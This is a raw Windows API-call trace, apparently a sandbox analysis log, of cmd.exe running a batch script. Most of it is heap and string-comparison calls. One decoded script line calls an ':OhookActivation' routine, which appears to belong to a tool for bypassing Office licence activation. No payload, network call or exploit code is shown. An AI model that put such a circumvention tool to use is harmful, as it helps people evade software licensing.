0x19a8f1e0000 [0179.625] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1efc40) returned 1 [0179.625] GetProcessHeap () returned 0x19a8f1e0000 [0179.625] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.625] GetProcessHeap () returned 0x19a8f1e0000 [0179.626] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207830) returned 1 [0179.626] GetProcessHeap () returned 0x19a8f1e0000 [0179.626] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f2200e0 [0179.626] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0179.626] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0179.626] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0179.626] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0179.626] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0179.626] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0179.626] GetProcessHeap () returned 0x19a8f1e0000 [0179.626] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21f4e0 [0179.627] GetProcessHeap () returned 0x19a8f1e0000 [0179.627] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eff10 [0179.627] GetProcessHeap () returned 0x19a8f1e0000 [0179.627] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1f0300 [0179.627] GetProcessHeap () returned 0x19a8f1e0000 [0179.627] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21f960 [0179.627] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0179.627] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0179.627] _wcsicmp (_String1="IF", _String2="find") returned 3 [0179.627] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0179.627] _wcsicmp (_String1="REM", _String2="find") returned 12 [0179.627] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0179.627] GetProcessHeap () returned 0x19a8f1e0000 [0179.627] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21f360 [0179.627] GetProcessHeap () returned 0x19a8f1e0000 [0179.627] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1effa0 [0179.627] GetProcessHeap () returned 0x19a8f1e0000 [0179.627] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2e) returned 0x19a8f1e08b0 [0179.627] GetProcessHeap () returned 0x19a8f1e0000 [0179.627] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0a70 [0179.627] GetProcessHeap () returned 0x19a8f1e0000 [0179.627] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1eca00 [0179.627] GetProcessHeap () returned 0x19a8f1e0000 [0179.627] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e08f0 [0179.627] GetProcessHeap () returned 0x19a8f1e0000 [0179.627] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ec880 [0179.627] GetProcessHeap () returned 0x19a8f1e0000 [0179.627] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x30) returned 0x19a8f1e0f70 [0179.627] GetProcessHeap () returned 0x19a8f1e0000 [0179.627] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f2201a0 [0179.628] GetProcessHeap () returned 0x19a8f1e0000 [0179.628] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21f420 [0179.629] _wcsicmp (_String1="FOR", _String2="setlocal") returned -13 [0179.629] _wcsicmp (_String1="FOR/?", _String2="setlocal") returned -13 [0179.629] _wcsicmp (_String1="IF", _String2="setlocal") returned -10 [0179.629] _wcsicmp (_String1="IF/?", _String2="setlocal") returned -10 [0179.629] _wcsicmp (_String1="REM", _String2="setlocal") returned -1 [0179.629] _wcsicmp (_String1="REM/?", _String2="setlocal") returned -1 [0179.629] GetProcessHeap () returned 0x19a8f1e0000 [0179.629] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f2204a0 [0179.629] GetProcessHeap () returned 0x19a8f1e0000 [0179.629] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1f0000 [0179.629] GetProcessHeap () returned 0x19a8f1e0000 [0179.629] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ec820 [0179.630] GetProcessHeap () returned 0x19a8f1e0000 [0179.630] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21f5a0 [0179.630] _wcsicmp (_String1="FOR", _String2="cls") returned 3 [0179.630] _wcsicmp (_String1="FOR/?", _String2="cls") returned 3 [0179.630] _wcsicmp (_String1="IF", _String2="cls") returned 6 [0179.630] _wcsicmp (_String1="IF/?", _String2="cls") returned 6 [0179.630] _wcsicmp (_String1="REM", _String2="cls") returned 15 [0179.630] _wcsicmp (_String1="REM/?", _String2="cls") returned 15 [0179.630] GetProcessHeap () returned 0x19a8f1e0000 [0179.630] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f220ce0 [0179.630] GetProcessHeap () returned 0x19a8f1e0000 [0179.630] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecd40 [0179.630] GetProcessHeap () returned 0x19a8f1e0000 [0179.630] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ec960 [0179.630] GetProcessHeap () returned 0x19a8f1e0000 [0179.630] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21fea0 [0179.630] GetProcessHeap () returned 0x19a8f1e0000 [0179.630] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f220920 [0179.630] _wcsicmp (_String1="FOR", _String2="call") returned 3 [0179.630] _wcsicmp (_String1="FOR/?", _String2="call") returned 3 [0179.630] _wcsicmp (_String1="IF", _String2="call") returned 6 [0179.630] _wcsicmp (_String1="IF/?", _String2="call") returned 6 [0179.630] _wcsicmp (_String1="REM", _String2="call") returned 15 [0179.630] _wcsicmp (_String1="REM/?", _String2="call") returned 15 [0179.630] GetProcessHeap () returned 0x19a8f1e0000 [0179.630] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21fa20 [0179.630] GetProcessHeap () returned 0x19a8f1e0000 [0179.630] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1f0330 [0179.630] GetProcessHeap () returned 0x19a8f1e0000 [0179.630] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x3a) returned 0x19a8f1f90e0 [0179.631] GetProcessHeap () returned 0x19a8f1e0000 [0179.631] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21ee20 [0179.631] _wcsicmp (_String1="FOR", _String2="endlocal") returned 1 [0179.631] _wcsicmp (_String1="FOR/?", _String2="endlocal") returned 1 [0179.631] _wcsicmp (_String1="IF", _String2="endlocal") returned 4 [0179.631] _wcsicmp (_String1="IF/?", _String2="endlocal") returned 4 [0179.631] _wcsicmp (_String1="REM", _String2="endlocal") returned 13 [0179.631] _wcsicmp (_String1="REM/?", _String2="endlocal") returned 13 [0179.631] GetProcessHeap () returned 0x19a8f1e0000 [0179.631] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21fd20 [0179.631] GetProcessHeap () returned 0x19a8f1e0000 [0179.631] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1f02a0 [0179.631] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.631] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x204e [0179.631] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efead0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efead0*=0x1fff, lpOverlapped=0x0) returned 1 [0179.631] SetFilePointer (in: hFile=0xa0, lDistanceToMove=8388, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20c4 [0179.631] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo \"%_args%\" | find /i \"/Ohook\" %nul% && (setlocal & cls & (call :OhookActivation %_args% %_silent%) & endlocal)\r\n", cbMultiByte=118, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo \"%_args%\" | find /i \"/Ohook\" %nul% && (setlocal & cls & (call :OhookActivation %_args% %_silent%) & endlocal)\r\n====================\r\n") returned 118 [0179.631] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.631] GetFileType (hFile=0xa0) returned 0x1 [0179.631] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.631] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20c4 [0179.631] GetProcessHeap () returned 0x19a8f1e0000 [0179.631] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207830 [0179.632] GetProcessHeap () returned 0x19a8f1e0000 [0179.632] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0179.632] GetProcessHeap () returned 0x19a8f1e0000 [0179.632] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1f0090 [0179.632] GetEnvironmentVariableW (in: lpName="_args", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0179.632] _wcsicmp (_String1="_args", _String2="CD") returned -4 [0179.632] _wcsicmp (_String1="_args", _String2="ERRORLEVEL") returned -6 [0179.632] _wcsicmp (_String1="_args", _String2="CMDEXTVERSION") returned -4 [0179.632] _wcsicmp (_String1="_args", _String2="CMDCMDLINE") returned -4 [0179.633] _wcsicmp (_String1="_args", _String2="DATE") returned -5 [0179.633] _wcsicmp (_String1="_args", _String2="TIME") returned -21 [0179.633] _wcsicmp (_String1="_args", _String2="RANDOM") returned -19 [0179.633] _wcsicmp (_String1="_args", _String2="HIGHESTNUMANODENUMBER") returned -9 [0179.633] GetProcessHeap () returned 0x19a8f1e0000 [0179.633] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0090) returned 1 [0179.633] GetProcessHeap () returned 0x19a8f1e0000 [0179.633] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.634] GetProcessHeap () returned 0x19a8f1e0000 [0179.634] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0179.634] GetProcessHeap () returned 0x19a8f1e0000 [0179.634] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec8a0 [0179.634] GetEnvironmentVariableW (in: lpName="nul", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x9 [0179.634] GetProcessHeap () returned 0x19a8f1e0000 [0179.634] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec8a0) returned 1 [0179.634] GetProcessHeap () returned 0x19a8f1e0000 [0179.635] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.635] GetProcessHeap () returned 0x19a8f1e0000 [0179.635] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0179.635] GetProcessHeap () returned 0x19a8f1e0000 [0179.635] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eff40 [0179.636] GetEnvironmentVariableW (in: lpName="_args", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0179.636] _wcsicmp (_String1="_args", _String2="CD") returned -4 [0179.636] _wcsicmp (_String1="_args", _String2="ERRORLEVEL") returned -6 [0179.636] _wcsicmp (_String1="_args", _String2="CMDEXTVERSION") returned -4 [0179.636] _wcsicmp (_String1="_args", _String2="CMDCMDLINE") returned -4 [0179.636] _wcsicmp (_String1="_args", _String2="DATE") returned -5 [0179.636] _wcsicmp (_String1="_args", _String2="TIME") returned -21 [0179.636] _wcsicmp (_String1="_args", _String2="RANDOM") returned -19 [0179.636] _wcsicmp (_String1="_args", _String2="HIGHESTNUMANODENUMBER") returned -9 [0179.636] GetProcessHeap () returned 0x19a8f1e0000 [0179.636] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eff40) returned 1 [0179.636] GetProcessHeap () returned 0x19a8f1e0000 [0179.636] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.637] GetProcessHeap () returned 0x19a8f1e0000 [0179.637] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0179.637] GetProcessHeap () returned 0x19a8f1e0000 [0179.637] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1f0240 [0179.637] GetEnvironmentVariableW (in: lpName="_silent", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0179.637] _wcsicmp (_String1="_silent", _String2="CD") returned -4 [0179.637] _wcsicmp (_String1="_silent", _String2="ERRORLEVEL") returned -6 [0179.637] _wcsicmp (_String1="_silent", _String2="CMDEXTVERSION") returned -4 [0179.637] _wcsicmp (_String1="_silent", _String2="CMDCMDLINE") returned -4 [0179.637] _wcsicmp (_String1="_silent", _String2="DATE") returned -5 [0179.637] _wcsicmp (_String1="_silent", _String2="TIME") returned -21 [0179.637] _wcsicmp (_String1="_silent", _String2="RANDOM") returned -19 [0179.637] _wcsicmp (_String1="_silent", _String2="HIGHESTNUMANODENUMBER") returned -9 [0179.637] GetProcessHeap () returned 0x19a8f1e0000 [0179.638] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0240) returned 1 [0179.638] GetProcessHeap () returned 0x19a8f1e0000 [0179.638] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.639] GetProcessHeap () returned 0x19a8f1e0000 [0179.639] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207830) returned 1 [0179.639] GetProcessHeap () returned 0x19a8f1e0000 [0179.639] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21f660 [0179.639] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0179.639] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0179.639] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0179.640] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0179.640] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0179.640] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0179.640] GetProcessHeap () returned 0x19a8f1e0000 [0179.640] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21f720 [0179.640] GetProcessHeap () returned 0x19a8f1e0000 [0179.640] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1efbb0 [0179.640] GetProcessHeap () returned 0x19a8f1e0000 [0179.640] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1f00f0 [0179.640] GetProcessHeap () returned 0x19a8f1e0000 [0179.640] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21eee0 [0179.640] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0179.640] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0179.640] _wcsicmp (_String1="IF", _String2="find") returned 3 [0179.640] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0179.640] _wcsicmp (_String1="REM", _String2="find") returned 12 [0179.640] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0179.640] GetProcessHeap () returned 0x19a8f1e0000 [0179.640] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21f7e0 [0179.640] GetProcessHeap () returned 0x19a8f1e0000 [0179.640] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eff40 [0179.640] GetProcessHeap () returned 0x19a8f1e0000 [0179.640] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2e) returned 0x19a8f1e0db0 [0179.640] GetProcessHeap () returned 0x19a8f1e0000 [0179.640] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0930 [0179.640] GetProcessHeap () returned 0x19a8f1e0000 [0179.640] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec780 [0179.640] GetProcessHeap () returned 0x19a8f1e0000 [0179.640] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0df0 [0179.640] GetProcessHeap () returned 0x19a8f1e0000 [0179.641] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ecbc0 [0179.641] GetProcessHeap () returned 0x19a8f1e0000 [0179.641] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x30) returned 0x19a8f1e0cf0 [0179.641] GetProcessHeap () returned 0x19a8f1e0000 [0179.641] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21f8a0 [0179.641] GetProcessHeap () returned 0x19a8f1e0000 [0179.641] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21fae0 [0179.641] _wcsicmp (_String1="FOR", _String2="setlocal") returned -13 [0179.641] _wcsicmp (_String1="FOR/?", _String2="setlocal") returned -13 [0179.641] _wcsicmp (_String1="IF", _String2="setlocal") returned -10 [0179.641] _wcsicmp (_String1="IF/?", _String2="setlocal") returned -10 [0179.641] _wcsicmp (_String1="REM", _String2="setlocal") returned -1 [0179.641] _wcsicmp (_String1="REM/?", _String2="setlocal") returned -1 [0179.641] GetProcessHeap () returned 0x19a8f1e0000 [0179.641] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21fba0 [0179.641] GetProcessHeap () returned 0x19a8f1e0000 [0179.641] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1f0030 [0179.641] GetProcessHeap () returned 0x19a8f1e0000 [0179.641] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ec6a0 [0179.641] GetProcessHeap () returned 0x19a8f1e0000 [0179.641] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21fde0 [0179.641] _wcsicmp (_String1="FOR", _String2="cls") returned 3 [0179.641] _wcsicmp (_String1="FOR/?", _String2="cls") returned 3 [0179.641] _wcsicmp (_String1="IF", _String2="cls") returned 6 [0179.641] _wcsicmp (_String1="IF/?", _String2="cls") returned 6 [0179.641] _wcsicmp (_String1="REM", _String2="cls") returned 15 [0179.641] _wcsicmp (_String1="REM/?", _String2="cls") returned 15 [0179.641] GetProcessHeap () returned 0x19a8f1e0000 [0179.641] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f220020 [0179.641] GetProcessHeap () returned 0x19a8f1e0000 [0179.641] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecb00 [0179.642] GetProcessHeap () returned 0x19a8f1e0000 [0179.642] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ec8a0 [0179.642] GetProcessHeap () returned 0x19a8f1e0000 [0179.642] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f220620 [0179.642] GetProcessHeap () returned 0x19a8f1e0000 [0179.642] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f220560 [0179.642] _wcsicmp (_String1="FOR", _String2="call") returned 3 [0179.642] _wcsicmp (_String1="FOR/?", _String2="call") returned 3 [0179.642] _wcsicmp (_String1="IF", _String2="call") returned 6 [0179.642] _wcsicmp (_String1="IF/?", _String2="call") returned 6 [0179.642] _wcsicmp (_String1="REM", _String2="call") returned 15 [0179.642] _wcsicmp (_String1="REM/?", _String2="call") returned 15 [0179.642] GetProcessHeap () returned 0x19a8f1e0000 [0179.642] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f2206e0 [0179.642] GetProcessHeap () returned 0x19a8f1e0000 [0179.642] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1f0060 [0179.642] GetProcessHeap () returned 0x19a8f1e0000 [0179.642] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x3a) returned 0x19a8f1f8f00 [0179.642] GetProcessHeap () returned 0x19a8f1e0000 [0179.642] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f2207a0 [0179.642] _wcsicmp (_String1="FOR", _String2="endlocal") returned 1 [0179.642] _wcsicmp (_String1="FOR/?", _String2="endlocal") returned 1 [0179.642] _wcsicmp (_String1="IF", _String2="endlocal") returned 4 [0179.642] _wcsicmp (_String1="IF/?", _String2="endlocal") returned 4 [0179.642] _wcsicmp (_String1="REM", _String2="endlocal") returned 13 [0179.642] _wcsicmp (_String1="REM/?", _String2="endlocal") returned 13 [0179.642] GetProcessHeap () returned 0x19a8f1e0000 [0179.642] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f208180 [0179.643] GetProcessHeap () returned 0x19a8f1e0000 [0179.643] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1f0120 [0179.643] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.643] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20c4 [0179.643] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efeaa0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efeaa0*=0x1fff, lpOverlapped=0x0) returned 1 [0179.643] SetFilePointer (in: hFile=0xa0, lDistanceToMove=8397, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20cd [0179.643] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="exit /b\r\n", cbMultiByte=9, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="exit /b\r\nrgs%\" | find /i \"/Ohook\" %nul% && (setlocal & cls & (call :OhookActivation %_args% %_silent%) & endlocal)\r\n====================\r\n") returned 9 [0179.643] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.643] GetFileType (hFile=0xa0) returned 0x1 [0179.644] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.644] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20cd [0179.644] GetProcessHeap () returned 0x19a8f1e0000 [0179.644] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0179.644] GetProcessHeap () returned 0x19a8f1e0000 [0179.645] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.645] GetProcessHeap () returned 0x19a8f1e0000 [0179.645] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f209680 [0179.645] _wcsicmp (_String1="FOR", _String2="exit") returned 1 [0179.645] _wcsicmp (_String1="FOR/?", _String2="exit") returned 1 [0179.645] _wcsicmp (_String1="IF", _String2="exit") returned 4 [0179.645] _wcsicmp (_String1="IF/?", _String2="exit") returned 4 [0179.645] _wcsicmp (_String1="REM", _String2="exit") returned 13 [0179.645] _wcsicmp (_String1="REM/?", _String2="exit") returned 13 [0179.645] GetProcessHeap () returned 0x19a8f1e0000 [0179.645] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f208780 [0179.645] GetProcessHeap () returned 0x19a8f1e0000 [0179.645] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1f0090 [0179.645] GetProcessHeap () returned 0x19a8f1e0000 [0179.645] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec720 [0179.645] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.645] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20cd [0179.645] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efea70, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efea70*=0x1fff, lpOverlapped=0x0) returned 1 [0179.645] SetFilePointer (in: hFile=0xa0, lDistanceToMove=8400, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20d0 [0179.645] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=")\r\nt /b\r\nrgs%\" | find /i \"/Ohook\" %nul% && (setlocal & cls & (call :OhookActivation %_args% %_silent%) & endlocal)\r\n====================\r\n") returned 3 [0179.646] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.646] GetFileType (hFile=0xa0) returned 0x1 [0179.646] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.646] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20d0 [0179.646] GetProcessHeap () returned 0x19a8f1e0000 [0179.646] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0179.646] GetProcessHeap () returned 0x19a8f1e0000 [0179.646] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.646] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0179.646] _tell (_FileHandle=3) returned 8400 [0179.646] _close (_FileHandle=3) returned 0 [0179.647] GetEnvironmentVariableW (in: lpName="_args", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0179.647] _wcsicmp (_String1="_args", _String2="CD") returned -4 [0179.647] _wcsicmp (_String1="_args", _String2="ERRORLEVEL") returned -6 [0179.647] _wcsicmp (_String1="_args", _String2="CMDEXTVERSION") returned -4 [0179.647] _wcsicmp (_String1="_args", _String2="CMDCMDLINE") returned -4 [0179.647] _wcsicmp (_String1="_args", _String2="DATE") returned -5 [0179.647] 